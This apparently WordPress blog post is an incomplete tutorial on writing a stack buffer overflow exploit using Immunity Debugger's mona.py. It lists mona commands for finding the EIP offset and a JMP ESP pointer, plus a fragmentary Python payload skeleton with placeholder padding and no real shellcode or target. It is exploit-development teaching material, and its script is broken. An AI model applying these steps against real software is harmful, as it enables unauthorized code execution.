Writing Exploits with Mona


0. ImmunityDebugger
1. !mona update
2. Attach to the process
2. !mona config -set workingfolder c:\logs\%p
3. !mona pattern_create 2000
!mona pattern_offset 37694136  (EIP value — during the crash)
5. Modify the script

print “Creating exploit.”
#Create the file
push=”A”*260 #Found by mona.py
eip =”BBBB” #more 4 bytes to overwrite EIP
junk=”C”*1736 #Later will replace this with real shellcode
print “File created”
  print “File cannot be created”

Our Next goal will be:
1. Replacing “BBBB” with valid pointer (Pointer to esp and esp will hold shellcode)
2. Solving an(CCCC… after EIP) easy problem.
3. Replacing “CCCCCC…” with real shellcode.

6. !mona jmp -r esp -o 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: